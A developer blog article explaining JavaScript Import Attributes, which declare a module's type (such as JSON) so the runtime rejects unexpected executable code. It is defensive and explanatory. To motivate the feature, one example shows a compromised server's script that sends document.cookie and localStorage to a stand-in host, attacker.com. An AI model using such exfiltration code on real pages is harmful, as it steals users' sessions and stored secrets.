Debugging Microservices & Distributed Systems
3 min read

JavaScript Import Attributes (ES2025)

Understanding the new import attributes syntax and why we can't rely on file extensions alone

JavaScript is getting a new feature that makes module imports more explicit and secure. Import Attributes add a way to pass metadata about any module we’re importing - whether it’s JSON, JavaScript, or other module types.

The Core Problem

On the web, file extensions don’t reliably indicate content. A server might return JavaScript when you’re expecting JSON:

JavaScript
// This looks safe, but could be dangerous
import config from './config.json';
// The server could respond with executable code:
export default (function(){
// Unexpected code execution
})();

The Solution: Import Attributes

Import Attributes create a contract between your code and the runtime. You explicitly declare what type of module you expect:

JavaScript
// Explicitly require JSON
import config from './config.json' with { type: "json" };
// Or specify JavaScript
import module from './module.js' with { type: "javascript" };
// Works with dynamic imports too
const data = await import('./config.json', {
with: { type: "json" }
});

The syntax works consistently across different module contexts:

JavaScript
// Re-exporting with attributes
export { data } from './data.json' with { type: "json" };
// Web Worker instantiation
new Worker("processor.wasm", {
type: "module",
with: { type: "webassembly" }
});

Why Import Attributes?

The core problem is security. On the web, file extensions don’t reliably indicate content. A URL ending in .json might actually serve JavaScript:

JavaScript
// Loading API configuration
import apiConfig from './api-config.json';
// What you expect to get:
{
"apiKey": "secret-key",
"endpoint": "https://api.example.com",
"timeout": 5000
}
// What a compromised server could send instead:
export default (function(){
// Send your API keys to an attacker
fetch('https://attacker.com', {
method: 'POST',
body: JSON.stringify({
cookies: document.cookie,
localStorage: window.localStorage
})
});
// Then return what looks like normal config
return {
apiKey: "secret-key",
endpoint: "https://api.example.com",
timeout: 5000
}
})();

Import Attributes make our module system more explicit and secure. JSON modules can’t execute code - they’re pure data. When you mark a module with type: "json", you’re guaranteed to get either JSON data or an error, never executable code.

The most immediate impact is on JSON imports, where security is crucial:

JavaScript
// Configuration files
import config from './config.json' with { type: "json" };
// Dynamic configuration
const config = await import(
`./config.${env}.json`,
{ with: { type: "json" }}
);

This feature creates a foundation for safely handling different module types in JavaScript. When it lands in 2025, we’ll have a standard way to declare our expectations about modules across all JavaScript environments.

Think of it as adding type safety to your module imports - not for the data inside the modules, but for the modules themselves.

Sources


Related Articles

If you enjoyed this article, you might find these related pieces interesting as well.

Recommended Engineering Resources

Here are engineering resources I've personally vetted and use. They focus on skills you'll actually need to build and scale real projects - the kind of experience that gets you hired or promoted.

Imagine where you would be in two years if you actually took the time to learn every day. A little effort consistently adds up, shaping your skills, opening doors, and building the career you envision. Start now, and future you will thank you.


This article was originally published on https://www.trevorlasn.com/blog/import-attributes-in-javascript. It was written by a human and polished using grammar tools for clarity.

Interested in a partnership? Shoot me an email at hi [at] trevorlasn.com with all relevant information.